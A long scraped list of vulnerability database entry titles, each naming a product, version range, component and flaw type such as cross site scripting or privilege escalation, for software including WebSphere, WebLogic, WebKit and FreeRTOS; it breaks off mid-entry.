WebSphere Application Server 8.5/9.0 privilege escalation [127877] SAP NetWeaver AS JAVA up to 7.50 Web Container cross site scripting [127862] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Java privilege escalation [127861] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1/7.0.3 Web UI cross site scripting [127774] Jenkins up to 2.153/LTS 2.138.3 Stapler Web Framework MetaClass.java privilege escalation [127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features [127656] Moxa NPort W2x50A up to 2.1 Web Server webSettingProfileSecurity privilege escalation [127655] Moxa NPort W2x50A up to 2.1 Web Server net_WebPingGetValue privilege escalation [127653] IBM 3.0.0/3.0.2/3.0.5 Web UI cross site scripting [127651] Amazon Web Services FreeRTOS xProcessReceivedTCPPacket information disclosure [127650] Amazon Web Services FreeRTOS DHCP Response information disclosure [127649] Amazon Web Services FreeRTOS IP Header prvProcessIPPacket memory corruption [127648] Amazon Web Services FreeRTOS ARP Packet eARPProcessPacket information disclosure [127647] Amazon Web Services FreeRTOS NBNS Packet prvTreatNBNS information disclosure [127646] Amazon Web Services FreeRTOS DNS Response xProcessReceivedUDPPacket/prvParseDNSReply privilege escalation [127644] Amazon Web Services FreeRTOS prvProcessICMPPacket information disclosure [127643] Amazon Web Services FreeRTOS Protocol Checksum Generator usGenerateProtocolChecksum/prvProcessIPPacket memory corruption [127642] Amazon Web Services FreeRTOS DNS LLMNR Packet prvParseDNSReply memory corruption [127641] Amazon Web Services FreeRTOS TCP Options prvCheckOptions information disclosure [127640] Amazon Web Services FreeRTOS prvCheckOptions denial of service [127634] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127633] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127632] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127631] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127630] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127629] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127596] Apple tvOS up to 12.1 WebKit memory corruption [127595] Apple tvOS up to 12.1 WebKit memory corruption [127594] Apple tvOS up to 12.1 WebKit memory corruption [127593] Apple tvOS up to 12.1 WebKit memory corruption [127592] Apple tvOS up to 12.1 WebKit memory corruption [127591] Apple tvOS up to 12.1 WebKit memory corruption [127533] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting [127516] SCADA Webserver up to 2.03 Reflected cross site scripting [127413] IBM WebSphere Application Server 8.5/9.0 Security Domain privilege escalation [127375] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server cross site request forgery [127374] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation [127373] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation [127372] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server cross site scripting [127371] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation [127269] IBM Maximo Asset Management 7.6 Web UI cross site scripting [127224] NUOO CMS up to 3.3 Web Server sql injection [127208] Fortinet FortiOS up to 5.2/5.4.7/5.6.3 Web Pages denial of service [127198] TerraMaster TOS 3.1.03 Web Application Session Token information disclosure [127195] TerraMaster TOS 3.1.03 Web Application Taskbar cross site scripting [127129] IBM WebSphere Application Server up to 9.0.0.9 XML Data XML External Entity [126926] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Installation Verification cross site scripting [126772] SAP Business Intelligence 4.1/4.2 Web Intelligence Richclient 3 Data Processing Error [126770] IBM WebSphere Commerce up to 9.0.0.6 privilege escalation [126652] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SIBMsgMigration Utility cross site scripting [126628] Squid Web Proxy up to 4.3 SNMP denial of service [126627] Squid Web Proxy up to 4.3 X.509 Certificate cross site scripting [126617] IBM Maximo Asset Management 7.6 Web UI cross site scripting [126605] IBM WebSphere MQ up to 8.x/9.1 MQTT privilege escalation [126587] Cisco Prime Collaboration Assurance Web-based UI privilege escalation [126418] InduSoft Web Studio/Aveva InTouch Edge HMI memory corruption [126417] InduSoft Web Studio/Aveva InTouch Edge HMI privilege escalation [126372] IBM WebSphere Application Server Liberty RP Service privilege escalation [126368] Advantech WebAccess 8.3.1/8.3.2 Bwmainleft.asp cross site scripting [126367] Advantech WebAccess 8.3.1/8.3.2 WADashboard API directory traversal [126366] Advantech WebAccess 8.3.1/8.3.2 WADashboard API directory traversal [126258] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126257] Apple iCloud up to 7.7 on Windows WebKit denial of service [126256] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126255] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126254] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126253] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126252] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126251] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126250] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126249] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126230] Apple watchOS up to 5.0.1 WebKit memory corruption [126229] Apple watchOS up to 5.0.1 WebKit memory corruption [126228] Apple watchOS up to 5.0.1 WebKit memory corruption [126227] Apple watchOS up to 5.0.1 WebKit memory corruption [126226] Apple watchOS up to 5.0.1 WebKit memory corruption [126225] Apple watchOS up to 5.0.1 WebKit memory corruption [126224] Apple watchOS up to 5.0.1 WebKit memory corruption [126223] Apple watchOS up to 5.0.1 WebKit memory corruption [126222] Apple watchOS up to 5.0.1 WebKit memory corruption [126209] Apple tvOS up to 12.0 WebKit memory corruption [126208] Apple tvOS up to 12.0 WebKit denial of service [126207] Apple tvOS up to 12.0 WebKit memory corruption [126206] Apple tvOS up to 12.0 WebKit memory corruption [126205] Apple tvOS up to 12.0 WebKit memory corruption [126204] Apple tvOS up to 12.0 WebKit memory corruption [126203] Apple tvOS up to 12.0 WebKit memory corruption [126121] Advantech WebAccess 8.3.2 memory corruption [126118] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Cachemonitor cross site scripting [125927] IBM WebSphere Commerce Enterprise 7.x/8.x/9.x Web UI cross site scripting [125913] Splunk Enterprise up to <=6.0.13 Web cross site scripting [125899] Axios Italia Axioscloud Sissiweb Registro Elettronico 1.7.0 secret/relogoff.aspx cross site scripting [125880] Advantech WebAccess up to 8.3.1 DLL File privilege escalation [125879] Advantech WebAccess up to 8.3.1 memory corruption [125878] Advantech WebAccess up to 8.3.1 directory traversal [125841] Advantech WebAccess up to 8.3.2 opcImg.asp memory corruption [125840] Advantech WebAccess up to 8.3.2 Reflected cross site scripting [125697] Linksys E1200/E2500 Web Portal apply.cgi machine_name privilege escalation [125696] Linksys E1200/E2500 Web Portal apply.cgi start_lltd privilege escalation [125593] Oracle MICROS Relate CRM Software 10.8/11.4 Web Services privilege escalation [125527] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [125487] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Console information disclosure [125484] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation [125481] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation [125480] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI cross site scripting [125476] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation [125475] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation [125474] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.3.0 Advanced UI privilege escalation [125472] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI privilege escalation [125446] Oracle WebLogic Server Docker Images privilege escalation [125445] Oracle WebLogic Server 12.1.3.0/12.2.1.3 WLS - Web Services privilege escalation [125443] Oracle HTTP Server 12.2.1.3 Web Listener memory corruption [125436] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 Spring Framework privilege escalation [125434] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation [125433] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation [125432] Oracle WebLogic Server 12.2.1.3 WLS Core Components privilege escalation [125431] Oracle WebLogic Server 12.1.3.0 WLS Core Components privilege escalation [125430] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation [125421] Oracle Hospitality Materials Control 18.1 MobileAuthWebService cross site scripting [125358] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting [125302] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting [125301] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting [125274] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 directory traversal [125271] IBM WebSphere Application Server 8.5/9.0 IBM Cloud Password information disclosure [125267] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp cross site scripting [125215] Intel Rapid Web Server 3 information disclosure [125210] Juniper Junos up to 17.3R3 Management Interface denial of service [125209] Juniper Junos J-Web Service privilege escalation [125206] Juniper ScreenOS up to 6.3.0r25 Graphical User Interface Persistent cross site scripting [125201] Juniper Junos on QFX5000/EX4600 Management Interface denial of service [125181] SAP Business Intelligence 4.10/4.20 Web Intelligence DHTML Client cross site scripting [125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation [124944] IBM 10 Web UI cross site scripting [124941] IBM Maximo Asset Management 7.6.0/7.6.1/7.6.2/7.6.3 Web UI cross site scripting [124933] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124924] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124923] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124922] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124921] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124920] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124919] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124918] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124917] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124916] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124915] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124914] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124913] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124912] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124911] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124910] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124890] Cisco Prime Infrastructure HTTP Web Server privilege escalation [124862] Cisco IOS XE Web Framework denial of service [124851] Cisco WebEx Player denial of service [124835] Cisco WebEx Teams privilege escalation [124822] Cisco Secure Access Control Server Web UI XML External Entity [124821] Cisco RV180W/RV220W Web Framework directory traversal [124820] Cisco RV180W/RV220W Web Framework SQL sql injection [124802] PHP Scripts Mall Website Seller Script 2.0.5 Keyword cross site scripting [124798] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124797] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124796] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124795] MediaWiki Web Access 1.31.0 .htaccess information disclosure [124765] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Oauth cross site scripting [124763] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML cross site scripting [124759] Naviwebs Navigate CMS 2.8 File Upload navigate_upload.php privilege escalation [124758] Naviwebs Navigate CMS 2.8 login.php sql injection [124695] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124694] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124693] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124692] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124687] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124685] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124680] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124679] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124678] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124677] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124676] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124675] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124668] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting [124653] IBM WebSphere Portal 7.0/8.0/8.5/9.0 weak authentication [124642] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Access Control privilege escalation [124557] IBM WebSphere Portal 8.0/8.5/9.0 Web UI cross site scripting [124542] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Redirect [124541] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting [124537] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting [124532] CMS ISWEB 3.5.3 moduli/downloadFile.php directory traversal [124531] CMS ISWEB 3.5.3 sql injection [124492] IBM WebSphere Application Server Liberty 145455 ORB Communication information disclosure [124482] pfSense up to up to 2.4.2 status_interfaces.php dhcp_relinquish_lease privilege escalation [124436] Asterisk PBX up to 13.23.0/14.7.7/15.6.0 res_http_websocket.so denial of service [124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation [124308] Moxa EDR-810 4.2 Build 18041013 net_WebCADELETEGetValue privilege escalation [124236] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface privilege escalation [124235] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface memory corruption [124234] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface memory corruption [124160] Oracle WebCenter Interaction 10.3.3 Username information disclosure [124159] Oracle WebCenter Interaction Portal 10.3.3 Session Cookie httponly 7PK Security Features [124158] Oracle WebCenter Interaction 10.3.3 Search Service queryd.exe weak authentication [124157] Oracle WebCenter Interaction 10.3.3 AjaxControl privilege escalation [124156] Oracle WebCenter Interaction 10.3.3 login Reflected cross site scripting [124155] Oracle WebCenter Interaction 10.3.3 login Redirect [124154] Oracle WebCenter Interaction 10.3.3 portalpages.dll DisplayResponse Reflected cross site scripting [124153] Oracle WebCenter Interaction 10.3.3 cross site request forgery [124062] IBM WebSphere Application Server 8.5/9.0 TLS information disclosure [123923] SAP WebDynpro Java 7.20/7.30/7.31/7.40/7.50 Stored cross site scripting [123921] SAP NetWeaver BI 7.30/7.31. 7.40/7.41/7.50 BEx Web Java Runtime Export Web Service privilege escalation [123797] PowerDNS Authoritative Server up to 3.4.10/4.0.1 Web Server denial of service [123734] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation [123697] Information Builders WebFOCUS Business Intelligence 8.1 privilege escalation [123665] IBM WebSphere Application Server 7.0/8.0/8.5.5 Form Login privilege escalation [123372] CMS ISWEB 3.5.3 index.php cross site scripting [123340] PHP Scripts Mall Website Seller Script 2.0.5 memory corruption [123339] PHP Scripts Mall Website Seller Script 2.0.5 cross site scripting [123290] IBM WebSphere Commerce up to <=7.0.0.0 FP8 information disclosure [123286] A10 ACOS Web Application Firewall up to 2.7.0/2.7.2-P11/4.1.0-P10/4.1.1-P7/4.1.2-P3 SQL Injection sql injection [123257] D-Link DIR-615 20.07 Web UI cross site scripting [123200] IBM WebSphere Application Server Liberty JASPIC information disclosure [123165] GitHub Electron 1.7.15/1.8.7/2.0.7/3.0.0-beta.6 WebPreferences 7PK Security Features [123158] MikroTik RouterOS up to 6.40.8/6.42.6 License Upgrade Interface memory corruption [122989] IBM Maximo Asset Management 7.6.0/7.6.1/7.6.2/7.6.3 Web UI cross site scripting [122969] OpenEMR up to 5.0.1.3 interface/fax/faxq.php privilege escalation [122939] Cisco AsyncOS/Web Security Appliance Proxy denial of service [122907] SAP HANA Extended Application Services 1 XS Command-Line Interface privilege escalation [122903] SAP Business Intelligence 4.2 Launchpad Web Intelligence sql injection [122820] Hikvision IP Camera Web Server memory corruption [122772] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 updprofile.php cross site request forgery [122691] IBM WebSphere MQ up to 9.0.0.3 privilege escalation [122667] IBM Jazz Foundation up to 6.0.5 Web UI cross site scripting [122580] SoftNAS Cloud up to 4.0.2 Web Administration Console privilege escalation [122564] IBM Maximo Asset Management 7.6 Web UI cross site scripting [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client weak authentication [122445] IBM Sterling B2B Integrator Standard Edition up to 5.2.6.3 Web UI cross site scripting [122336] Foreman 1.5.1 Web UI Stored cross site scripting [122239] GitLab Community Edition/Enterprise Edition up to 10.8.6/11.0.4/11.1.1 Web DIE File Commit cross site scripting [122123] Atlassian JIRA up to 7.6.6/7.10.x Webhooks information disclosure [122106] Jenkins up to 2.121.1/2.132 Stapler Web Framework Stapler.java privilege escalation [122097] McAfee Web Gateway 7.8.1.x directory traversal [122094] Chamilo LMS 11.x Unserialization /webservices/api/v2.php privilege escalation [122082] IBM Sterling B2B Integrator Standard Edition up to 5.2.6 Web UI cross site scripting [122081] IBM WebSphere MQ 7.5/8.0/9.0 Message privilege escalation [122059] mitmproxy 4.0.3 tools/web/app.py DNS Rebinding privilege escalation [122047] IBM Sterling B2B Integrator Standard Edition up to 2.2.6 Web UI cross site scripting [122011] cckevincyh SSH CompanyWebsite up to 2018-05-03 fileUploadAction_fileUpload.action privilege escalation [122010] cckevincyh SSH CompanyWebsite up to 2018-05-03 noticeManageAction_queryNotice.action sql injection [121971] webEdition CMS up to 6.2.6/6.3.7 Installer setup.php privilege escalation [121937] Cisco Web Framework cross site scripting [121936] Cisco Cloud Services Platform 2100 Web Upload privilege escalation [121933] Cisco WebEx Web Framework DOM-Based cross site scripting [121932] Cisco WebEx Teams on Windows/macOS privilege escalation [121931] Cisco WebEx Network Recording Player denial of service [121930] Cisco WebEx Network Recording Player memory corruption [121770] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121769] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121768] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121767] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121766] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121765] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121764] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121763] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation [121725] Oracle Hospitality Cruise Fleet Management System 9.x Gangway Activity Web App privilege escalation [121723] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation [121722] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Portlet Services privilege escalation [121719] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 SAML privilege escalation [121717] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Console privilege escalation [121712] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Web Server privilege escalation [121692] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 JSF privilege escalation [121689] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation [121688] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Web Services privilege escalation [121687] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Sample Apps privilege escalation [121686] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Console privilege escalation [121685] Oracle WebCenter Portal 12.2.1.3.0 Security Framework privilege escalation [121618] Oracle Application Testing Suite 10.1 Load Testing for Web Apps privilege escalation [121599] Oracle Marketing 12.1.1/12.1.2/12.1.3 User Interface privilege escalation [121593] Oracle 8.4/15.x/16.x Web Access privilege escalation [121592] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation [121588] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation [121587] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation [121179] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121173] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121134] Moodle up to 3.1.12/3.3.6/3.4.3/3.5.0 Web Service information disclosure [121127] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121126] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121125] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121123] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [121040] Apple watchOS up to 4.3.1 WebKit memory corruption [121039] Apple watchOS up to 4.3.1 WebKit memory corruption [121038] Apple watchOS up to 4.3.1 WebKit memory corruption [121037] Apple watchOS up to 4.3.1 WebKit memory corruption [121036] Apple watchOS up to 4.3.1 WebKit memory corruption [121035] Apple watchOS up to 4.3.1 WebKit race condition [121034] Apple watchOS up to 4.3.1 WebKit privilege escalation [121033] Apple watchOS up to 4.3.1 WebKit memory corruption [121026] Apple tvOS up to 11.4.0 WebKit memory corruption [121025] Apple tvOS up to 11.4.0 WebKit memory corruption [121024] Apple tvOS up to 11.4.0 WebKit memory corruption [121023] Apple tvOS up to 11.4.0 WebKit memory corruption [121022] Apple tvOS up to 11.4.0 WebKit memory corruption [121021] Apple tvOS up to 11.4.0 WebKit memory corruption [121020] Apple tvOS up to 11.4.0 WebKit memory corruption [121019] Apple tvOS up to 11.4.0 WebKit memory corruption [121018] Apple tvOS up to 11.4.0 WebKit memory corruption [121017] Apple tvOS up to 11.4.0 WebKit race condition [121016] Apple tvOS up to 11.4.0 WebKit privilege escalation [121015] Apple tvOS up to 11.4.0 WebKit 7PK Security Features [121014] Apple tvOS up to 11.4.0 WebKit memory corruption [120986] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120985] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120984] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120983] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120982] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120981] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120980] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120979] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120978] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120977] Apple iCloud up to 7.5 on Windows WebKit race condition [120976] Apple iCloud up to 7.5 on Windows WebKit 7PK Security Features [120975] Apple iCloud up to 7.5 on Windows WebKit privilege escalation [120974] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120934] PHP Scripts Mall Auditor Website 2.0.1 cross site scripting [120925] Mycroft AI up to 18.2.8b on Linux WebSocket Server privilege escalation [120479] ADB Broadband Router on Epicentro Command Line Interface privilege escalation [120294] Schneider Electric U.motion Builder up to 1.3.3 Web Service sql injection [120243] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120242] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120241] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120240] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120239] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120238] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120237] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120236] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120235] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120234] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120233] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120232] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120231] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120230] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120229] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120228] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120227] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120226] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120225] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120224] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120223] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120222] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120221] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120220] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120219] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120218] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120217] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120216] IBM Rational Quality Manager up to 5.0.2/6.0.6 Web UI cross site scripting [120215] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting [120169] PRTG Network Monitor up to 18.2.38 Web Console privilege escalation [120167] IceWarp Mail Server 12.0.3 webdav/ticket/ cross site scripting [120101] Weblication CMS Core / Grid 12.6.24 wFilemanager.php Persistent cross site scripting [120096] Zoho ManageEngine Netflow Analyzer Web Server information disclosure [120091] CMS MaeloStore 1.5.0 Admin Interface Stored cross site scripting [120040] TIBCO Spotfire Web Player Client privilege escalation [120038] TIBCO Spotfire Web Player Client privilege escalation [120037] IBM WebSphere Application Server up to 18.0.0.1 SAML Web SSO information disclosure [120036] IBM WebSphere MQ 8.0/9.0 SSL Certificate Validator weak authentication [120005] IBM WebSphere MQ up to 7.1.0.9/7.5.0.8/8.0.0.8/9.0.0.2/9.0.4 Queue Manager privilege escalation [119990] AXIS IP Camera Interface privilege escalation [119976] Badge Plugin up to 1.4 on Jenkins Web UI BadgeSummaryAction.java Persistent cross site scripting [119826] Insteon HD IP Camera White 2864-222 Web Service memory corruption [119825] Insteon HD IP Camera White 2864-222 Web Service cgi-bin/CGIProxy.fcgi memory corruption [119824] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML Response information disclosure [119764] Cisco FXOS/UCS Fabric Interconnect Software Web UI memory corruption [119657] ovirt-engine up to 4.2.2 Web Console transport.py EventData User information disclosure [119611] Open-Xchange OX AppSuite up to 7.8.3-rev11/7.8.4-rev8 Office-Web cross site scripting [119591] IBM WebSphere MQ 8.0/9.0 PAM Module privilege escalation [119570] McAfee Web Gateway up to 7.8.1.5 JMX Service weak authentication [119569] Automated Logic WebCTRL 6.0/6.1/6.5 XML External Entity [119537] NetApp SANtricity Web Services Proxy Java Management Extension privilege escalation [119510] SensioLabs Symfony 3.3.6 Web Profiler _profiler/open Reflected cross site scripting [119478] Microsoft Office Web Apps Server/Office Online Server privilege escalation [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119373] VMware NSX SD-WAN Edge up to 2.x/3.1.1 Web GUI privilege escalation [119328] Midnight Coders WebORB for Java 5.1.1.0 AMF3 Deserializer privilege escalation [119282] PHP Scripts Mall Schools Alert Management Script /webmasterst/general.php privilege escalation [119250] Cisco WebEx Web Framework cross site scripting [119249] Cisco WebEx Web Framework cross site scripting [119248] Cisco Unified Communications Manager Web UI privilege escalation [119247] Cisco Unity Connection Web Framework cross site scripting [119246] Cisco Web Security Appliance 10.5.1/10.5.2/11.0.0 Traffic Monitor 7PK Security Features [119244] Cisco Unified Communications Manager Web Framework cross site scripting [119233] Cisco Prime Collaboration Provisioning up to 12.1 Web Framework SQL sql injection [119224] Cisco Integrated Management Controller Web-based Management Console DOM cross site scripting [119147] wintiwebdev on Node.js URL directory traversal [119075] pooledwebsocket on Node.js URL directory traversal [118972] Git Plugin up to 3.9.0 on Jenkins AssemblaWeb.java privilege escalation [118852] webdriver-launcher on Node.js Download weak encryption [118749] Apple iCloud up to 7.4 on Windows WebKit information disclosure [118748] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118747] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118746] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118745] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118744] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118743] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118742] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118741] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118740] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118739] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118738] Apple iCloud up to 7.4 on Windows WebKit race condition [118737] Apple iCloud up to 7.4 on Windows WebKit Data Processing Error [118733] Apple watchOS up to 4.3.0 WebKit information disclosure [118732] Apple watchOS up to 4.3.0 WebKit memory corruption [118731] Apple watchOS up to 4.3.0 WebKit memory corruption [118730] Apple watchOS up to 4.3.0 WebKit memory corruption [118729] Apple watchOS up to 